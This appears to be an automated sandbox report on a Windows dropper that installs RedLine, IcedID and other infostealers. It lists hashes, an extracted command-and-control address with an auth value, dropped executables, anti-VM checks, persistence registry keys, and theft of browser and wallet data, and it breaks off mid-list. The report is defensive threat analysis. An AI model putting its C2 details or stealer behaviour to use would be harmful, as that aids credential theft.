Analysis
-
max time kernel
210s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
18-02-2022 01:05
Static task
static1
Behavioral task
behavioral1
Sample
win_setup__620eea0b11a3e.exe
Resource
win7-en-20211208
General
-
Target
win_setup__620eea0b11a3e.exe
-
Size
7.0MB
-
MD5
90021c53649c314350fd3e9cca970d82
-
SHA1
b6bc62fab52efee5b2a8a930149480253bab6544
-
SHA256
8ecab59305943daf37f9de9924dbb11ecc24f2e610c889ee4541d47bf155c7e8
-
SHA512
616ca8784511aca210c81b43112694ca73e293d057f46f48069f5f6624163c41fcbcdb0fe9533cc85a97ae58a96716ae21f70c5fbcb997bd300921bbdcb656f0
Malware Config
Extracted
redline
media1530
92.255.57.154:11841
-
auth_value
0fca4b66c95739362b57ce7db49c6b9e
Extracted
icedid
1860595763
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 544 1492 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 17 IoCs
Processes:
resource yara_rule behavioral2/memory/4564-284-0x0000000000B50000-0x0000000000D54000-memory.dmp family_redline behavioral2/memory/4564-287-0x0000000000B50000-0x0000000000D54000-memory.dmp family_redline behavioral2/memory/4544-298-0x0000000000B50000-0x0000000000D54000-memory.dmp family_redline behavioral2/memory/4544-293-0x0000000000B50000-0x0000000000D54000-memory.dmp family_redline behavioral2/memory/4616-290-0x0000000000B50000-0x0000000000D54000-memory.dmp family_redline behavioral2/memory/4616-286-0x0000000000B50000-0x0000000000D54000-memory.dmp family_redline behavioral2/memory/4480-278-0x0000000000CA0000-0x0000000001191000-memory.dmp family_redline behavioral2/memory/4488-275-0x0000000000CA0000-0x0000000001191000-memory.dmp family_redline behavioral2/memory/4480-274-0x0000000000CA0000-0x0000000001191000-memory.dmp family_redline behavioral2/memory/4424-268-0x0000000000CA0000-0x0000000001191000-memory.dmp family_redline behavioral2/memory/4544-271-0x0000000000B50000-0x0000000000D54000-memory.dmp family_redline behavioral2/memory/4616-264-0x0000000000B50000-0x0000000000D54000-memory.dmp family_redline behavioral2/memory/4564-263-0x0000000000B50000-0x0000000000D54000-memory.dmp family_redline behavioral2/memory/4488-255-0x0000000000CA0000-0x0000000001191000-memory.dmp family_redline behavioral2/memory/4480-254-0x0000000000CA0000-0x0000000001191000-memory.dmp family_redline behavioral2/memory/4424-245-0x0000000000CA0000-0x0000000001191000-memory.dmp family_redline behavioral2/memory/4712-303-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 23 IoCs
Processes:
WerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeSecond.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4864 created 3448 4864 620ee9f3162da_Fri00b5daea42.exe PID 3824 created 3448 3824 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 2012 created 1664 2012 cmd.exe rundll32.exe PID 5300 created 1484 5300 WerFault.exe 620ee9f8079d0_Fri009b6e1f0f0.exe PID 5492 created 3448 5492 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 6016 created 3448 6016 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 4136 created 3448 4136 Second.exe 620ee9f3162da_Fri00b5daea42.exe PID 532 created 3448 532 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 6136 created 5320 6136 cmd.exe 5216484602.exe PID 4892 created 5320 4892 WerFault.exe 5216484602.exe PID 4320 created 5740 4320 WerFault.exe Second.exe PID 3572 created 5320 3572 WerFault.exe WMIC.exe PID 544 created 3448 544 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 5592 created 3448 5592 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 5972 created 5320 5972 WerFault.exe WMIC.exe PID 5532 created 3448 5532 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 5600 created 5320 5600 WerFault.exe WMIC.exe PID 6136 created 3672 6136 WerFault.exe explorer.exe PID 5592 created 2736 5592 WerFault.exe DllHost.exe PID 3020 created 5780 3020 WerFault.exe DllHost.exe PID 1748 created 2632 1748 WerFault.exe DllHost.exe PID 3320 created 5892 3320 WerFault.exe DllHost.exe PID 5268 created 2000 5268 WerFault.exe DllHost.exe -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
-
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil
-
suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND
suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND
-
suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND
suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0470360D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0470360D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0470360D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0470360D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0470360D\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0470360D\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 1 IoCs
Processes:
WMIC.exeflow pid process 110 5320 WMIC.exe -
Downloads MZ/PE file
-
Executes dropped EXE 46 IoCs
Processes:
setup_installer.exesetup_install.exe620ee9bce72ea_Fri00a1d5e5045.exe620ee9c09b72d_Fri00ef1dae.exe620ee9f3162da_Fri00b5daea42.exe620ee9f8079d0_Fri009b6e1f0f0.exe620ee9f6d521e_Fri005bb939a12f.exe620ee9bc939e5_Fri001f6e5e.exe620ee9c20f6fc_Fri00f49041.exe620ee9bbbbcb5_Fri003a32992dd.exe620ee9f904e5f_Fri008a64a161.exe620eea0052b41_Fri0064244e526.exe620ee9f4890f0_Fri00080e80.exe620ee9c09b72d_Fri00ef1dae.tmp620ee9bdae9b2_Fri00129f9288f5.exe620ee9f0f317f_Fri00dfd53221.exe620ee9f904e5f_Fri008a64a161.tmp620ee9f6d521e_Fri005bb939a12f.exe620ee9bdae9b2_Fri00129f9288f5.exe620ee9c09b72d_Fri00ef1dae.exesihclient.execmd.exe620ee9c09b72d_Fri00ef1dae.tmpM8BDG.exeM8BDG.exeM8BDG.exeE1FA1.exeE1FA1.exeE1FA1.execacls.exeFile.exeFirst.exeinst1.exe620ee9bc939e5_Fri001f6e5e.exe6758832152.exea3ffcc91-8a0c-4a12-89a1-6c8faa676d4c.exe5(6665____.exe5216484602.exedllhostwin.exe2172678247.exe42ED.exe49F3.exe4E49.exeSecond.exeSecond.exeSecond.exepid process 1856 setup_installer.exe 952 setup_install.exe 3300 620ee9bce72ea_Fri00a1d5e5045.exe 3360 620ee9c09b72d_Fri00ef1dae.exe 3448 620ee9f3162da_Fri00b5daea42.exe 1484 620ee9f8079d0_Fri009b6e1f0f0.exe 3840 620ee9f6d521e_Fri005bb939a12f.exe 972 620ee9bc939e5_Fri001f6e5e.exe 3340 620ee9c20f6fc_Fri00f49041.exe 1316 620ee9bbbbcb5_Fri003a32992dd.exe 2428 620ee9f904e5f_Fri008a64a161.exe 2512 620eea0052b41_Fri0064244e526.exe 2520 620ee9f4890f0_Fri00080e80.exe 3812 620ee9c09b72d_Fri00ef1dae.tmp 64 620ee9bdae9b2_Fri00129f9288f5.exe 2452 620ee9f0f317f_Fri00dfd53221.exe 2904 620ee9f904e5f_Fri008a64a161.tmp 1588 620ee9f6d521e_Fri005bb939a12f.exe 2092 620ee9bdae9b2_Fri00129f9288f5.exe 4124 620ee9c09b72d_Fri00ef1dae.exe 4232 sihclient.exe 4264 cmd.exe 4372 620ee9c09b72d_Fri00ef1dae.tmp 4424 M8BDG.exe 4480 M8BDG.exe 4488 M8BDG.exe 4544 E1FA1.exe 4564 E1FA1.exe 4616 E1FA1.exe 4632 cacls.exe 4728 File.exe 4872 First.exe 4908 inst1.exe 4712 620ee9bc939e5_Fri001f6e5e.exe 4080 6758832152.exe 4704 a3ffcc91-8a0c-4a12-89a1-6c8faa676d4c.exe 1852 5(6665____.exe 5320 5216484602.exe 5612 dllhostwin.exe 5740 2172678247.exe 1612 42ED.exe 5700 49F3.exe 5988 4E49.exe 4136 Second.exe 5744 Second.exe 5740 Second.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\11111.exe upx C:\Users\Admin\AppData\Local\Temp\11111.exe upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
cacls.exe4E49.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cacls.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cacls.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4E49.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4E49.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
setup_installer.exe620ee9bdae9b2_Fri00129f9288f5.exe620ee9f0f317f_Fri00dfd53221.exe620ee9c09b72d_Fri00ef1dae.tmpFirst.exe620ee9bbbbcb5_Fri003a32992dd.exerundll32.execmd.exewin_setup__620eea0b11a3e.exe620ee9f8079d0_Fri009b6e1f0f0.exe620ee9bce72ea_Fri00a1d5e5045.execmd.exe620ee9f3162da_Fri00b5daea42.exe4E49.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation setup_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9bdae9b2_Fri00129f9288f5.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9f0f317f_Fri00dfd53221.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9c09b72d_Fri00ef1dae.tmp Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation First.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9bbbbcb5_Fri003a32992dd.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation win_setup__620eea0b11a3e.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9f8079d0_Fri009b6e1f0f0.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9bce72ea_Fri00a1d5e5045.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9f3162da_Fri00b5daea42.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 4E49.exe -
Loads dropped DLL 16 IoCs
Processes:
setup_install.exe620ee9c09b72d_Fri00ef1dae.tmp620ee9f904e5f_Fri008a64a161.tmp620ee9c09b72d_Fri00ef1dae.tmprundll32.exerundll32.exerundll32.exe4E49.exepid process 952 setup_install.exe 952 setup_install.exe 952 setup_install.exe 952 setup_install.exe 952 setup_install.exe 3812 620ee9c09b72d_Fri00ef1dae.tmp 2904 620ee9f904e5f_Fri008a64a161.tmp 4372 620ee9c09b72d_Fri00ef1dae.tmp 2000 rundll32.exe 2000 rundll32.exe 1664 rundll32.exe 6132 rundll32.exe 6132 rundll32.exe 5988 4E49.exe 5988 4E49.exe 5988 4E49.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620eea0052b41_Fri0064244e526.exe themida behavioral2/memory/2512-209-0x0000000000680000-0x0000000000A42000-memory.dmp themida behavioral2/memory/2512-229-0x0000000000680000-0x0000000000A42000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\7zS0470360D\620eea0052b41_Fri0064244e526.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
File.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce File.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" File.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
620eea0052b41_Fri0064244e526.exe4E49.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 620eea0052b41_Fri0064244e526.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4E49.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 30 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
Processes:
cacls.exeM8BDG.exeM8BDG.exeM8BDG.exeE1FA1.exeE1FA1.exeE1FA1.exe4E49.exepid process 2512 cacls.exe 4424 M8BDG.exe 4488 M8BDG.exe 4480 M8BDG.exe 4564 E1FA1.exe 4616 E1FA1.exe 4544 E1FA1.exe 5988 4E49.exe 5988 4E49.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
cacls.exe620ee9bc939e5_Fri001f6e5e.exeSecond.exedescription pid process target process PID 3840 set thread context of 1588 3840 cacls.exe 620ee9f6d521e_Fri005bb939a12f.exe PID 972 set thread context of 4712 972 620ee9bc939e5_Fri001f6e5e.exe 620ee9bc939e5_Fri001f6e5e.exe PID 4136 set thread context of 5740 4136 Second.exe Second.exe -
Drops file in Program Files directory 3 IoCs
Processes:
620ee9c09b72d_Fri00ef1dae.tmpdescription ioc process File created C:\Program Files (x86)\AtomTweaker\is-8C2VQ.tmp 620ee9c09b72d_Fri00ef1dae.tmp File opened for modification C:\Program Files (x86)\AtomTweaker\unins000.dat 620ee9c09b72d_Fri00ef1dae.tmp File created C:\Program Files (x86)\AtomTweaker\unins000.dat 620ee9c09b72d_Fri00ef1dae.tmp -
Drops file in Windows directory 64 IoCs
Processes:
TiWorker.exedescription ioc process File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx-microsoft.build.framework_b03f5f7f11d50a3a_10.0.19041.1_none_392aece9b755bc99.manifest TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx-_vc_assembly_linker_messages_b03f5f7f11d50a3a_10.0.19041.1_none_de6c3c3b21885865.manifest TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\7a6f061da32bec498d550726b55d9476.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\9a629ae49cf9114c862b0f5f1ef41104.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\b0ad45effb25f84cbf7d59a12ae68beb.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\b242fe87ec3bf84592aad9d8fccbb2a3.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\5a2a9959b616b24a888b39ff266f4b8a.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\3116c9f42de96541b09545c06c8512a8.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\aeb9120cb9d2fe4eb6832c99c4797208.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\17f7931f82f32648a2768e10cd0e9980.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\cbe8ff1852765f45aa84f4bd1e893e59.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_isymwrapper_b03f5f7f11d50a3a_10.0.19041.1_none_819702978fa44022\ISymWrapper.dll TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\c6056e9a3e5e854bb7ee928d95f8a1fb.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx-aspnet_webadmin_appconfig_b03f5f7f11d50a3a_10.0.19041.1_none_c80a5db2e67418fe\SmtpSettings.aspx TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx35linq-edmgen_31bf3856ad364e35_10.0.19041.1_none_646d0595db3c1ad4\EdmGen.exe.config TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx35linq-system....dynamicdata.design_31bf3856ad364e35_10.0.19041.1_none_4c594ddb8e102132.manifest TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\x86_aspnet_compiler_b03f5f7f11d50a3a_10.0.19041.1_none_d9afbb23e990d44a\aspnet_compiler.exe TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\daf8e5a95603f94eb316e1fa73fa3396.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\07c99e9c2b57ee4babad38fc8c257c07.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\msil_sysglobl_b03f5f7f11d50a3a_10.0.19041.1_none_95c882191b279871.manifest TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx-aspnet_isapi_dll_b03f5f7f11d50a3a_10.0.19041.1_none_56b8d5ffe587fd30\aspnet_isapi.dll TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\30e1547f63444843b9d77616f8d9f496.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\x86_netfx-aspnet_regbrowser_files_b03f5f7f11d50a3a_10.0.19041.1_none_31ecd66e5cc4b8f1\panasonic.browser TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\x86_netfx-shared_netfx_20_perfcounter_31bf3856ad364e35_10.0.19041.1_none_a723631dce180fe0.manifest TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\33ca3c18d58540448bb0b8b1d4f5e324.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx-aspnet_common_sql_b03f5f7f11d50a3a_10.0.19041.1_none_87be8b660d3a7753\UninstallCommon.sql TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\5d77679ddf59254cb079cf572cf935f1.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx35linq-system...ent.instrumentation_31bf3856ad364e35_10.0.19041.1_none_d6720fb439cf7cc6.manifest TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\58b10bca9eb6124e8b109016b9dbac00.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\msil_system.runtime.remoting_b77a5c561934e089_10.0.19041.1_none_867d0b05d632a638.manifest TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\x86_netfx35linq-system.data.linq_31bf3856ad364e35_10.0.19041.1_none_c3928265f2885f9f\System.Data.Linq.dll TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\316b3e29f902ae4e85f714e311765a31.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\b1a69d9a92d04046adeb4c5b203bb5ab.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\msil_system.speech_31bf3856ad364e35_10.0.19041.1_none_63bf1d3f67880c1a\System.Speech.dll TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\4ac1506b759b4949a952af91cd09b75d.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\x86_netfx-normalization_dll_b03f5f7f11d50a3a_10.0.19041.1_none_9d190fe3bea71631\normalization.dll TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx-aspnet_webadmin_permissions_b03f5f7f11d50a3a_10.0.19041.1_none_0e1fb02a57158eaf.manifest TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx-microsoft.build.utilities_b03f5f7f11d50a3a_10.0.19041.1_none_07802b833c6673c7\Microsoft.Build.Utilities.dll TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\904df2448159b94f98c8bce0b3632bff.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\x86_wwf-cwetargets_i_31bf3856ad364e35_10.0.19041.1_none_fa2e3902bfd8b286.manifest TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\128cab901732084994ef21ec095ccf06.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\x86_wpf-penimc_31bf3856ad364e35_10.0.19041.1_none_058384e7ebade92e\PenIMC.dll TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\x86_wpf-xamlviewer_31bf3856ad364e35_10.0.19041.1_none_afe0be8163ecf7d4\XamlViewer_v0300.exe TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\x86_netfx-perfcounter_dll_b03f5f7f11d50a3a_10.0.19041.1_none_eabf966090a8b105.manifest TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\10dfefad194f4844a2d83d5c012e9b6b.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\amd64_netfx-assemblylist_xml_b03f5f7f11d50a3a_10.0.19041.1_none_d02d4b7bc0e2f0bf\FrameworkList.xml TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\ff8fe03e2b783d4496ba0adc742ca8b9.tmp TiWorker.exe File opened for modification C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\msil_ieexecremote_b03f5f7f11d50a3a_10.0.19041.1_none_b0577105563707f3\IEExecRemote.dll TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\556dc6a3a692c7409b7e5c9caf095052.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\f04f682eddba7148ac3ef178f1375c04.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\d59955497588c74f84d6e7ffd54b658d.tmp TiWorker.exe File created C:\Windows\CbsTemp\30942316_938154191\Microsoft-Windows-NetFx3-OnDemand-Package~31bf3856ad364e35~amd64~~.cab\$dpx$.tmp\28c34a473ba41b4b9c89313b26eba663.tmp TiWorker.exe File opened for modification 